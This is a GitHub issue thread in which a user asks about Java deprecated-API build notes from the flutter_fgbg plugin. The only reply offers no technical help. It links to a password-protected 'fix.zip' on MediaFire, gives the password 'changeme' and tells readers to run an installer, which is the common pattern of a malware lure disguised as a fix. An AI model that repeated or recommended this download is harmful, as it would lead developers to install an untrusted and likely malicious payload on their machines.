### ISSUE TITLE
deprecated API

### ISSUE THREAD

**Issue by Nulinz** [ajinasokan/flutter_fgbg#25]
Note: C:\Users\myusername\AppData\Local\Pub\Cache\hosted\pub.dev\flutter_fgbg-0.6.0\android\src\main\java\com\ajinasokan\flutter_fgbg\FlutterFGBGPlugin.java uses or overrides a deprecated API.
Note: Recompile with -Xlint:deprecation for details.
Note: Some input files use or override a deprecated API.

i'm using alarm package that package using Flutter_fgbg service but when run my app or build the app i got this error how to resolve this issue kindly tell me!

**Comment by HTneko** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."
